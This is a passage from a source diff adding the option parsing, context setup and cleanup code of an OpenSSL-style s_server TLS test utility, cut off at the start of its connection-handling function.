+        } else if (strcmp(*argv, "-dcert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_dcert_file = *(++argv);
+        } else if (strcmp(*argv, "-dkeyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_dkey_format = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-dpass") == 0) {
+            if (--argc < 1)
+                goto bad;
+            dpassarg = *(++argv);
+        } else if (strcmp(*argv, "-dkey") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_dkey_file = *(++argv);
+        } else if (strcmp(*argv, "-dcert_chain") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_dchain_file = *(++argv);
+        } else if (strcmp(*argv, "-nocert") == 0) {
+            nocert = 1;
+        } else if (strcmp(*argv, "-CApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CApath = *(++argv);
+        } else if (strcmp(*argv, "-chainCApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            chCApath = *(++argv);
+        } else if (strcmp(*argv, "-verifyCApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            vfyCApath = *(++argv);
+        } else if (strcmp(*argv, "-no_cache") == 0)
+            no_cache = 1;
+        else if (strcmp(*argv, "-ext_cache") == 0)
+            ext_cache = 1;
+        else if (strcmp(*argv, "-CRLform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crl_format = str2fmt(*(++argv));
+        } else if (args_verify(&argv, &argc, &badarg, bio_err, &vpm)) {
+            if (badarg)
+                goto bad;
+            continue;
+        } else if (args_excert(&argv, &argc, &badarg, bio_err, &exc)) {
+            if (badarg)
+                goto bad;
+            continue;
+        } else if (args_ssl(&argv, &argc, cctx, &badarg, bio_err, &ssl_args)) {
+            if (badarg)
+                goto bad;
+            continue;
+        } else if (strcmp(*argv, "-verify_return_error") == 0)
+            verify_return_error = 1;
+        else if (strcmp(*argv, "-verify_quiet") == 0)
+            verify_quiet = 1;
+        else if (strcmp(*argv, "-build_chain") == 0)
+            build_chain = 1;
+        else if (strcmp(*argv, "-CAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+        } else if (strcmp(*argv, "-chainCAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            chCAfile = *(++argv);
+        } else if (strcmp(*argv, "-verifyCAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            vfyCAfile = *(++argv);
+        }
+#ifdef FIONBIO
+        else if (strcmp(*argv, "-nbio") == 0) {
+            s_nbio = 1;
+        }
+#endif
+        else if (strcmp(*argv, "-nbio_test") == 0) {
+#ifdef FIONBIO
+            s_nbio = 1;
+#endif
+            s_nbio_test = 1;
+        } else if (strcmp(*argv, "-ign_eof") == 0)
+            s_ign_eof = 1;
+        else if (strcmp(*argv, "-no_ign_eof") == 0)
+            s_ign_eof = 0;
+        else if (strcmp(*argv, "-debug") == 0) {
+            s_debug = 1;
+        }
+#ifndef OPENSSL_NO_TLSEXT
+        else if (strcmp(*argv, "-tlsextdebug") == 0)
+            s_tlsextdebug = 1;
+        else if (strcmp(*argv, "-status") == 0)
+            s_tlsextstatus = 1;
+        else if (strcmp(*argv, "-status_verbose") == 0) {
+            s_tlsextstatus = 1;
+            tlscstatp.verbose = 1;
+        } else if (!strcmp(*argv, "-status_timeout")) {
+            s_tlsextstatus = 1;
+            if (--argc < 1)
+                goto bad;
+            tlscstatp.timeout = atoi(*(++argv));
+        } else if (!strcmp(*argv, "-status_url")) {
+            s_tlsextstatus = 1;
+            if (--argc < 1)
+                goto bad;
+            if (!OCSP_parse_url(*(++argv),
+                                &tlscstatp.host,
+                                &tlscstatp.port,
+                                &tlscstatp.path, &tlscstatp.use_ssl)) {
+                BIO_printf(bio_err, "Error parsing URL\n");
+                goto bad;
+            }
+        }
+#endif
+        else if (strcmp(*argv, "-msg") == 0) {
+            s_msg = 1;
+        } else if (strcmp(*argv, "-msgfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            bio_s_msg = BIO_new_file(*(++argv), "w");
+        }
+#ifndef OPENSSL_NO_SSL_TRACE
+        else if (strcmp(*argv, "-trace") == 0) {
+            s_msg = 2;
+        }
+#endif
+        else if (strcmp(*argv, "-hack") == 0) {
+            hack = 1;
+        } else if (strcmp(*argv, "-state") == 0) {
+            state = 1;
+        } else if (strcmp(*argv, "-crlf") == 0) {
+            s_crlf = 1;
+        } else if (strcmp(*argv, "-quiet") == 0) {
+            s_quiet = 1;
+        } else if (strcmp(*argv, "-brief") == 0) {
+            s_quiet = 1;
+            s_brief = 1;
+            verify_quiet = 1;
+        } else if (strcmp(*argv, "-no_tmp_rsa") == 0) {
+            no_tmp_rsa = 1;
+        } else if (strcmp(*argv, "-no_dhe") == 0) {
+            no_dhe = 1;
+        } else if (strcmp(*argv, "-no_ecdhe") == 0) {
+            no_ecdhe = 1;
+        } else if (strcmp(*argv, "-no_resume_ephemeral") == 0) {
+            no_resume_ephemeral = 1;
+        }
+#ifndef OPENSSL_NO_PSK
+        else if (strcmp(*argv, "-psk_hint") == 0) {
+            if (--argc < 1)
+                goto bad;
+            psk_identity_hint = *(++argv);
+        } else if (strcmp(*argv, "-psk") == 0) {
+            size_t i;
+
+            if (--argc < 1)
+                goto bad;
+            psk_key = *(++argv);
+            for (i = 0; i < strlen(psk_key); i++) {
+                if (isxdigit((unsigned char)psk_key[i]))
+                    continue;
+                BIO_printf(bio_err, "Not a hex number '%s'\n", *argv);
+                goto bad;
+            }
+        }
+#endif
+#ifndef OPENSSL_NO_SRP
+        else if (strcmp(*argv, "-srpvfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srp_verifier_file = *(++argv);
+            meth = TLSv1_server_method();
+        } else if (strcmp(*argv, "-srpuserseed") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srpuserseed = *(++argv);
+            meth = TLSv1_server_method();
+        }
+#endif
+        else if (strcmp(*argv, "-rev") == 0) {
+            rev = 1;
+        } else if (strcmp(*argv, "-www") == 0) {
+            www = 1;
+        } else if (strcmp(*argv, "-WWW") == 0) {
+            www = 2;
+        } else if (strcmp(*argv, "-HTTP") == 0) {
+            www = 3;
+        }
+#ifndef OPENSSL_NO_SSL2
+        else if (strcmp(*argv, "-ssl2") == 0) {
+            no_ecdhe = 1;
+            meth = SSLv2_server_method();
+        }
+#endif
+#ifndef OPENSSL_NO_SSL3_METHOD
+        else if (strcmp(*argv, "-ssl3") == 0) {
+            meth = SSLv3_server_method();
+        }
+#endif
+#ifndef OPENSSL_NO_TLS1
+        else if (strcmp(*argv, "-tls1") == 0) {
+            meth = TLSv1_server_method();
+        } else if (strcmp(*argv, "-tls1_1") == 0) {
+            meth = TLSv1_1_server_method();
+        } else if (strcmp(*argv, "-tls1_2") == 0) {
+            meth = TLSv1_2_server_method();
+        }
+#endif
+#ifndef OPENSSL_NO_DTLS1
+        else if (strcmp(*argv, "-dtls") == 0) {
+            meth = DTLS_server_method();
+            socket_type = SOCK_DGRAM;
+        } else if (strcmp(*argv, "-dtls1") == 0) {
+            meth = DTLSv1_server_method();
+            socket_type = SOCK_DGRAM;
+        } else if (strcmp(*argv, "-dtls1_2") == 0) {
+            meth = DTLSv1_2_server_method();
+            socket_type = SOCK_DGRAM;
+        } else if (strcmp(*argv, "-timeout") == 0)
+            enable_timeouts = 1;
+        else if (strcmp(*argv, "-mtu") == 0) {
+            if (--argc < 1)
+                goto bad;
+            socket_mtu = atol(*(++argv));
+        } else if (strcmp(*argv, "-chain") == 0)
+            cert_chain = 1;
+#endif
+        else if (strcmp(*argv, "-id_prefix") == 0) {
+            if (--argc < 1)
+                goto bad;
+            session_id_prefix = *(++argv);
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine_id = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        }
+#ifndef OPENSSL_NO_TLSEXT
+        else if (strcmp(*argv, "-servername") == 0) {
+            if (--argc < 1)
+                goto bad;
+            tlsextcbp.servername = *(++argv);
+        } else if (strcmp(*argv, "-servername_fatal") == 0) {
+            tlsextcbp.extension_error = SSL_TLSEXT_ERR_ALERT_FATAL;
+        } else if (strcmp(*argv, "-cert2") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_cert_file2 = *(++argv);
+        } else if (strcmp(*argv, "-key2") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_key_file2 = *(++argv);
+        }
+# ifndef OPENSSL_NO_NEXTPROTONEG
+        else if (strcmp(*argv, "-nextprotoneg") == 0) {
+            if (--argc < 1)
+                goto bad;
+            next_proto_neg_in = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-alpn") == 0) {
+            if (--argc < 1)
+                goto bad;
+            alpn_in = *(++argv);
+        }
+#endif
+#if !defined(OPENSSL_NO_JPAKE) && !defined(OPENSSL_NO_PSK)
+        else if (strcmp(*argv, "-jpake") == 0) {
+            if (--argc < 1)
+                goto bad;
+            jpake_secret = *(++argv);
+        }
+#endif
+#ifndef OPENSSL_NO_SRTP
+        else if (strcmp(*argv, "-use_srtp") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srtp_profiles = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-keymatexport") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keymatexportlabel = *(++argv);
+        } else if (strcmp(*argv, "-keymatexportlen") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keymatexportlen = atoi(*(++argv));
+            if (keymatexportlen == 0)
+                goto bad;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badop = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+    if (badop) {
+ bad:
+        sv_usage();
+        goto end;
+    }
+#ifndef OPENSSL_NO_DTLS1
+    if (www && socket_type == SOCK_DGRAM) {
+        BIO_printf(bio_err, "Can't use -HTTP, -www or -WWW with DTLS\n");
+        goto end;
+    }
+#endif
+
+#if !defined(OPENSSL_NO_JPAKE) && !defined(OPENSSL_NO_PSK)
+    if (jpake_secret) {
+        if (psk_key) {
+            BIO_printf(bio_err, "Can't use JPAKE and PSK together\n");
+            goto end;
+        }
+        psk_identity = "JPAKE";
+    }
+#endif
+
+    SSL_load_error_strings();
+    OpenSSL_add_ssl_algorithms();
+
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine_id, 1);
+#endif
+
+    if (!app_passwd(bio_err, passarg, dpassarg, &pass, &dpass)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if (s_key_file == NULL)
+        s_key_file = s_cert_file;
+#ifndef OPENSSL_NO_TLSEXT
+    if (s_key_file2 == NULL)
+        s_key_file2 = s_cert_file2;
+#endif
+
+    if (!load_excert(&exc, bio_err))
+        goto end;
+
+    if (nocert == 0) {
+        s_key = load_key(bio_err, s_key_file, s_key_format, 0, pass, e,
+                         "server certificate private key file");
+        if (!s_key) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        s_cert = load_cert(bio_err, s_cert_file, s_cert_format,
+                           NULL, e, "server certificate file");
+
+        if (!s_cert) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (s_chain_file) {
+            s_chain = load_certs(bio_err, s_chain_file, FORMAT_PEM,
+                                 NULL, e, "server certificate chain");
+            if (!s_chain)
+                goto end;
+        }
+#ifndef OPENSSL_NO_TLSEXT
+        if (tlsextcbp.servername) {
+            s_key2 = load_key(bio_err, s_key_file2, s_key_format, 0, pass, e,
+                              "second server certificate private key file");
+            if (!s_key2) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+
+            s_cert2 = load_cert(bio_err, s_cert_file2, s_cert_format,
+                                NULL, e, "second server certificate file");
+
+            if (!s_cert2) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        }
+#endif                          /* OPENSSL_NO_TLSEXT */
+    }
+#if !defined(OPENSSL_NO_TLSEXT)
+# if !defined(OPENSSL_NO_NEXTPROTONEG)
+    if (next_proto_neg_in) {
+        unsigned short len;
+        next_proto.data = next_protos_parse(&len, next_proto_neg_in);
+        if (next_proto.data == NULL)
+            goto end;
+        next_proto.len = len;
+    } else {
+        next_proto.data = NULL;
+    }
+# endif
+    alpn_ctx.data = NULL;
+    if (alpn_in) {
+        unsigned short len;
+        alpn_ctx.data = next_protos_parse(&len, alpn_in);
+        if (alpn_ctx.data == NULL)
+            goto end;
+        alpn_ctx.len = len;
+    }
+#endif
+
+    if (crl_file) {
+        X509_CRL *crl;
+        crl = load_crl(crl_file, crl_format);
+        if (!crl) {
+            BIO_puts(bio_err, "Error loading CRL\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        crls = sk_X509_CRL_new_null();
+        if (!crls || !sk_X509_CRL_push(crls, crl)) {
+            BIO_puts(bio_err, "Error adding CRL\n");
+            ERR_print_errors(bio_err);
+            X509_CRL_free(crl);
+            goto end;
+        }
+    }
+
+    if (s_dcert_file) {
+
+        if (s_dkey_file == NULL)
+            s_dkey_file = s_dcert_file;
+
+        s_dkey = load_key(bio_err, s_dkey_file, s_dkey_format,
+                          0, dpass, e, "second certificate private key file");
+        if (!s_dkey) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        s_dcert = load_cert(bio_err, s_dcert_file, s_dcert_format,
+                            NULL, e, "second server certificate file");
+
+        if (!s_dcert) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (s_dchain_file) {
+            s_dchain = load_certs(bio_err, s_dchain_file, FORMAT_PEM,
+                                  NULL, e, "second server certificate chain");
+            if (!s_dchain)
+                goto end;
+        }
+
+    }
+
+    if (!app_RAND_load_file(NULL, bio_err, 1) && inrand == NULL
+        && !RAND_status()) {
+        BIO_printf(bio_err,
+                   "warning, not much extra random data, consider using the -rand option\n");
+    }
+    if (inrand != NULL)
+        BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                   app_RAND_load_files(inrand));
+
+    if (bio_s_out == NULL) {
+        if (s_quiet && !s_debug) {
+            bio_s_out = BIO_new(BIO_s_null());
+            if (s_msg && !bio_s_msg)
+                bio_s_msg = BIO_new_fp(stdout, BIO_NOCLOSE);
+        } else {
+            if (bio_s_out == NULL)
+                bio_s_out = BIO_new_fp(stdout, BIO_NOCLOSE);
+        }
+    }
+#if !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_DSA) || !defined(OPENSSL_NO_ECDSA)
+    if (nocert)
+#endif
+    {
+        s_cert_file = NULL;
+        s_key_file = NULL;
+        s_dcert_file = NULL;
+        s_dkey_file = NULL;
+#ifndef OPENSSL_NO_TLSEXT
+        s_cert_file2 = NULL;
+        s_key_file2 = NULL;
+#endif
+    }
+
+    ctx = SSL_CTX_new(meth);
+    if (ctx == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    if (session_id_prefix) {
+        if (strlen(session_id_prefix) >= 32)
+            BIO_printf(bio_err,
+                       "warning: id_prefix is too long, only one new session will be possible\n");
+        else if (strlen(session_id_prefix) >= 16)
+            BIO_printf(bio_err,
+                       "warning: id_prefix is too long if you use SSLv2\n");
+        if (!SSL_CTX_set_generate_session_id(ctx, generate_session_id)) {
+            BIO_printf(bio_err, "error setting 'id_prefix'\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        BIO_printf(bio_err, "id_prefix '%s' set.\n", session_id_prefix);
+    }
+    SSL_CTX_set_quiet_shutdown(ctx, 1);
+    if (hack)
+        SSL_CTX_set_options(ctx, SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG);
+    if (exc)
+        ssl_ctx_set_excert(ctx, exc);
+    /*
+     * DTLS: partial reads end up discarding unread UDP bytes :-( Setting
+     * read ahead solves this problem.
+     */
+    if (socket_type == SOCK_DGRAM)
+        SSL_CTX_set_read_ahead(ctx, 1);
+
+    if (state)
+        SSL_CTX_set_info_callback(ctx, apps_ssl_info_callback);
+    if (no_cache)
+        SSL_CTX_set_session_cache_mode(ctx, SSL_SESS_CACHE_OFF);
+    else if (ext_cache)
+        init_session_cache_ctx(ctx);
+    else
+        SSL_CTX_sess_set_cache_size(ctx, 128);
+
+#ifndef OPENSSL_NO_SRTP
+    if (srtp_profiles != NULL)
+        SSL_CTX_set_tlsext_use_srtp(ctx, srtp_profiles);
+#endif
+
+#if 0
+    if (cipher == NULL)
+        cipher = getenv("SSL_CIPHER");
+#endif
+
+#if 0
+    if (s_cert_file == NULL) {
+        BIO_printf(bio_err,
+                   "You must specify a certificate file for the server to use\n");
+        goto end;
+    }
+#endif
+
+    if ((!SSL_CTX_load_verify_locations(ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(ctx))) {
+        /* BIO_printf(bio_err,"X509_load_verify_locations\n"); */
+        ERR_print_errors(bio_err);
+        /* goto end; */
+    }
+    if (vpm)
+        SSL_CTX_set1_param(ctx, vpm);
+
+    ssl_ctx_add_crls(ctx, crls, 0);
+
+    if (!args_ssl_call(ctx, bio_err, cctx, ssl_args, no_ecdhe, no_jpake))
+        goto end;
+
+    if (!ssl_load_stores(ctx, vfyCApath, vfyCAfile, chCApath, chCAfile,
+                         crls, crl_download)) {
+        BIO_printf(bio_err, "Error loading store locations\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+#ifndef OPENSSL_NO_TLSEXT
+    if (s_cert2) {
+        ctx2 = SSL_CTX_new(meth);
+        if (ctx2 == NULL) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (ctx2) {
+        BIO_printf(bio_s_out, "Setting secondary ctx parameters\n");
+
+        if (session_id_prefix) {
+            if (strlen(session_id_prefix) >= 32)
+                BIO_printf(bio_err,
+                           "warning: id_prefix is too long, only one new session will be possible\n");
+            else if (strlen(session_id_prefix) >= 16)
+                BIO_printf(bio_err,
+                           "warning: id_prefix is too long if you use SSLv2\n");
+            if (!SSL_CTX_set_generate_session_id(ctx2, generate_session_id)) {
+                BIO_printf(bio_err, "error setting 'id_prefix'\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+            BIO_printf(bio_err, "id_prefix '%s' set.\n", session_id_prefix);
+        }
+        SSL_CTX_set_quiet_shutdown(ctx2, 1);
+        if (hack)
+            SSL_CTX_set_options(ctx2, SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG);
+        if (exc)
+            ssl_ctx_set_excert(ctx2, exc);
+        /*
+         * DTLS: partial reads end up discarding unread UDP bytes :-(
+         * Setting read ahead solves this problem.
+         */
+        if (socket_type == SOCK_DGRAM)
+            SSL_CTX_set_read_ahead(ctx2, 1);
+
+        if (state)
+            SSL_CTX_set_info_callback(ctx2, apps_ssl_info_callback);
+
+        if (no_cache)
+            SSL_CTX_set_session_cache_mode(ctx2, SSL_SESS_CACHE_OFF);
+        else if (ext_cache)
+            init_session_cache_ctx(ctx2);
+        else
+            SSL_CTX_sess_set_cache_size(ctx2, 128);
+
+        if ((!SSL_CTX_load_verify_locations(ctx2, CAfile, CApath)) ||
+            (!SSL_CTX_set_default_verify_paths(ctx2))) {
+            ERR_print_errors(bio_err);
+        }
+        if (vpm)
+            SSL_CTX_set1_param(ctx2, vpm);
+
+        ssl_ctx_add_crls(ctx2, crls, 0);
+
+        if (!args_ssl_call(ctx2, bio_err, cctx, ssl_args, no_ecdhe, no_jpake))
+            goto end;
+
+    }
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    if (next_proto.data)
+        SSL_CTX_set_next_protos_advertised_cb(ctx, next_proto_cb,
+                                              &next_proto);
+# endif
+    if (alpn_ctx.data)
+        SSL_CTX_set_alpn_select_cb(ctx, alpn_cb, &alpn_ctx);
+#endif
+
+#ifndef OPENSSL_NO_DH
+    if (!no_dhe) {
+        DH *dh = NULL;
+
+        if (dhfile)
+            dh = load_dh_param(dhfile);
+        else if (s_cert_file)
+            dh = load_dh_param(s_cert_file);
+
+        if (dh != NULL) {
+            BIO_printf(bio_s_out, "Setting temp DH parameters\n");
+        } else {
+            BIO_printf(bio_s_out, "Using default temp DH parameters\n");
+            dh = get_dh512();
+        }
+        (void)BIO_flush(bio_s_out);
+
+        SSL_CTX_set_tmp_dh(ctx, dh);
+# ifndef OPENSSL_NO_TLSEXT
+        if (ctx2) {
+            if (!dhfile) {
+                DH *dh2 = load_dh_param(s_cert_file2);
+                if (dh2 != NULL) {
+                    BIO_printf(bio_s_out, "Setting temp DH parameters\n");
+                    (void)BIO_flush(bio_s_out);
+
+                    DH_free(dh);
+                    dh = dh2;
+                }
+            }
+            SSL_CTX_set_tmp_dh(ctx2, dh);
+        }
+# endif
+        DH_free(dh);
+    }
+#endif
+
+    if (!set_cert_key_stuff(ctx, s_cert, s_key, s_chain, build_chain))
+        goto end;
+#ifndef OPENSSL_NO_TLSEXT
+    if (s_serverinfo_file != NULL
+        && !SSL_CTX_use_serverinfo_file(ctx, s_serverinfo_file)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+    if (ctx2 && !set_cert_key_stuff(ctx2, s_cert2, s_key2, NULL, build_chain))
+        goto end;
+#endif
+    if (s_dcert != NULL) {
+        if (!set_cert_key_stuff(ctx, s_dcert, s_dkey, s_dchain, build_chain))
+            goto end;
+    }
+#ifndef OPENSSL_NO_RSA
+# if 1
+    if (!no_tmp_rsa) {
+        SSL_CTX_set_tmp_rsa_callback(ctx, tmp_rsa_cb);
+#  ifndef OPENSSL_NO_TLSEXT
+        if (ctx2)
+            SSL_CTX_set_tmp_rsa_callback(ctx2, tmp_rsa_cb);
+#  endif
+    }
+# else
+    if (!no_tmp_rsa && SSL_CTX_need_tmp_RSA(ctx)) {
+        RSA *rsa;
+
+        BIO_printf(bio_s_out, "Generating temp (512 bit) RSA key...");
+        BIO_flush(bio_s_out);
+
+        rsa = RSA_generate_key(512, RSA_F4, NULL);
+
+        if (!SSL_CTX_set_tmp_rsa(ctx, rsa)) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+#  ifndef OPENSSL_NO_TLSEXT
+        if (ctx2) {
+            if (!SSL_CTX_set_tmp_rsa(ctx2, rsa)) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        }
+#  endif
+        RSA_free(rsa);
+        BIO_printf(bio_s_out, "\n");
+    }
+# endif
+#endif
+
+#ifndef OPENSSL_NO_PSK
+# ifdef OPENSSL_NO_JPAKE
+    if (psk_key != NULL)
+# else
+    if (psk_key != NULL || jpake_secret)
+# endif
+    {
+        if (s_debug)
+            BIO_printf(bio_s_out,
+                       "PSK key given or JPAKE in use, setting server callback\n");
+        SSL_CTX_set_psk_server_callback(ctx, psk_server_cb);
+    }
+
+    if (!SSL_CTX_use_psk_identity_hint(ctx, psk_identity_hint)) {
+        BIO_printf(bio_err, "error setting PSK identity hint to context\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+#endif
+
+    SSL_CTX_set_verify(ctx, s_server_verify, verify_callback);
+    SSL_CTX_set_session_id_context(ctx, (void *)&s_server_session_id_context,
+                                   sizeof s_server_session_id_context);
+
+    /* Set DTLS cookie generation and verification callbacks */
+    SSL_CTX_set_cookie_generate_cb(ctx, generate_cookie_callback);
+    SSL_CTX_set_cookie_verify_cb(ctx, verify_cookie_callback);
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (ctx2) {
+        SSL_CTX_set_verify(ctx2, s_server_verify, verify_callback);
+        SSL_CTX_set_session_id_context(ctx2,
+                                       (void *)&s_server_session_id_context,
+                                       sizeof s_server_session_id_context);
+
+        tlsextcbp.biodebug = bio_s_out;
+        SSL_CTX_set_tlsext_servername_callback(ctx2, ssl_servername_cb);
+        SSL_CTX_set_tlsext_servername_arg(ctx2, &tlsextcbp);
+        SSL_CTX_set_tlsext_servername_callback(ctx, ssl_servername_cb);
+        SSL_CTX_set_tlsext_servername_arg(ctx, &tlsextcbp);
+    }
+#endif
+
+#ifndef OPENSSL_NO_SRP
+    if (srp_verifier_file != NULL) {
+        srp_callback_parm.vb = SRP_VBASE_new(srpuserseed);
+        srp_callback_parm.user = NULL;
+        srp_callback_parm.login = NULL;
+        if ((ret =
+             SRP_VBASE_init(srp_callback_parm.vb,
+                            srp_verifier_file)) != SRP_NO_ERROR) {
+            BIO_printf(bio_err,
+                       "Cannot initialize SRP verifier file \"%s\":ret=%d\n",
+                       srp_verifier_file, ret);
+            goto end;
+        }
+        SSL_CTX_set_verify(ctx, SSL_VERIFY_NONE, verify_callback);
+        SSL_CTX_set_srp_cb_arg(ctx, &srp_callback_parm);
+        SSL_CTX_set_srp_username_callback(ctx, ssl_srp_server_param_cb);
+    } else
+#endif
+    if (CAfile != NULL) {
+        SSL_CTX_set_client_CA_list(ctx, SSL_load_client_CA_file(CAfile));
+#ifndef OPENSSL_NO_TLSEXT
+        if (ctx2)
+            SSL_CTX_set_client_CA_list(ctx2, SSL_load_client_CA_file(CAfile));
+#endif
+    }
+
+    BIO_printf(bio_s_out, "ACCEPT\n");
+    (void)BIO_flush(bio_s_out);
+    if (rev)
+        do_server(port, socket_type, &accept_socket, rev_body, context,
+                  naccept);
+    else if (www)
+        do_server(port, socket_type, &accept_socket, www_body, context,
+                  naccept);
+    else
+        do_server(port, socket_type, &accept_socket, sv_body, context,
+                  naccept);
+    print_stats(bio_s_out, ctx);
+    ret = 0;
+ end:
+    if (ctx != NULL)
+        SSL_CTX_free(ctx);
+    if (s_cert)
+        X509_free(s_cert);
+    if (crls)
+        sk_X509_CRL_pop_free(crls, X509_CRL_free);
+    if (s_dcert)
+        X509_free(s_dcert);
+    if (s_key)
+        EVP_PKEY_free(s_key);
+    if (s_dkey)
+        EVP_PKEY_free(s_dkey);
+    if (s_chain)
+        sk_X509_pop_free(s_chain, X509_free);
+    if (s_dchain)
+        sk_X509_pop_free(s_dchain, X509_free);
+    if (pass)
+        OPENSSL_free(pass);
+    if (dpass)
+        OPENSSL_free(dpass);
+    if (vpm)
+        X509_VERIFY_PARAM_free(vpm);
+    free_sessions();
+#ifndef OPENSSL_NO_TLSEXT
+    if (tlscstatp.host)
+        OPENSSL_free(tlscstatp.host);
+    if (tlscstatp.port)
+        OPENSSL_free(tlscstatp.port);
+    if (tlscstatp.path)
+        OPENSSL_free(tlscstatp.path);
+    if (ctx2 != NULL)
+        SSL_CTX_free(ctx2);
+    if (s_cert2)
+        X509_free(s_cert2);
+    if (s_key2)
+        EVP_PKEY_free(s_key2);
+    if (serverinfo_in != NULL)
+        BIO_free(serverinfo_in);
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    if (next_proto.data)
+        OPENSSL_free(next_proto.data);
+# endif
+    if (alpn_ctx.data)
+        OPENSSL_free(alpn_ctx.data);
+#endif
+    ssl_excert_free(exc);
+    if (ssl_args)
+        sk_OPENSSL_STRING_free(ssl_args);
+    if (cctx)
+        SSL_CONF_CTX_free(cctx);
+#ifndef OPENSSL_NO_JPAKE
+    if (jpake_secret && psk_key)
+        OPENSSL_free(psk_key);
+#endif
+    if (bio_s_out != NULL) {
+        BIO_free(bio_s_out);
+        bio_s_out = NULL;
+    }
+    if (bio_s_msg != NULL) {
+        BIO_free(bio_s_msg);
+        bio_s_msg = NULL;
+    }
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static void print_stats(BIO *bio, SSL_CTX *ssl_ctx)
+{
+    BIO_printf(bio, "%4ld items in the session cache\n",
+               SSL_CTX_sess_number(ssl_ctx));
+    BIO_printf(bio, "%4ld client connects (SSL_connect())\n",
+               SSL_CTX_sess_connect(ssl_ctx));
+    BIO_printf(bio, "%4ld client renegotiates (SSL_connect())\n",
+               SSL_CTX_sess_connect_renegotiate(ssl_ctx));
+    BIO_printf(bio, "%4ld client connects that finished\n",
+               SSL_CTX_sess_connect_good(ssl_ctx));
+    BIO_printf(bio, "%4ld server accepts (SSL_accept())\n",
+               SSL_CTX_sess_accept(ssl_ctx));
+    BIO_printf(bio, "%4ld server renegotiates (SSL_accept())\n",
+               SSL_CTX_sess_accept_renegotiate(ssl_ctx));
+    BIO_printf(bio, "%4ld server accepts that finished\n",
+               SSL_CTX_sess_accept_good(ssl_ctx));
+    BIO_printf(bio, "%4ld session cache hits\n", SSL_CTX_sess_hits(ssl_ctx));
+    BIO_printf(bio, "%4ld session cache misses\n",
+               SSL_CTX_sess_misses(ssl_ctx));
+    BIO_printf(bio, "%4ld session cache timeouts\n",
+               SSL_CTX_sess_timeouts(ssl_ctx));
+    BIO_printf(bio, "%4ld callback cache hits\n",
+               SSL_CTX_sess_cb_hits(ssl_ctx));
+    BIO_printf(bio, "%4ld cache full overflows (%ld allowed)\n",
+               SSL_CTX_sess_cache_full(ssl_ctx),
+               SSL_CTX_sess_get_cache_size(ssl_ctx));
+}
+
+static int sv_body(char *hostname, int s, int stype, unsigned char *context)
+{
+    char *buf = NULL;
+    fd_set readfds;
+    int ret = 1, width;
+    int k, i;
+    unsigned long l;
+    SSL *con = NULL;
+    BIO *sbio;
+#ifndef OPENSSL_NO_KRB5
+    KSSL_CTX *kctx;
+#endif
+    struct timeval timeout;
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_NETWARE) || defined(OPENSSL_SYS_BEOS_R5)
+    struct timeval tv;
+#else
+    struct timeval *timeoutp;
+#endif
+
+    if ((buf = OPENSSL_malloc(bufsize)) == NULL) {
+        BIO_printf(bio_err, "out of memory\n");
+        goto err;
+    }
+#ifdef FIONBIO
+    if (s_nbio) {
+        unsigned long sl = 1;
+
+        if (!s_quiet)
+            BIO_printf(bio_err, "turning on non blocking io\n");
+        if (BIO_socket_ioctl(s, FIONBIO, &sl) < 0)
+            ERR_print_errors(bio_err);
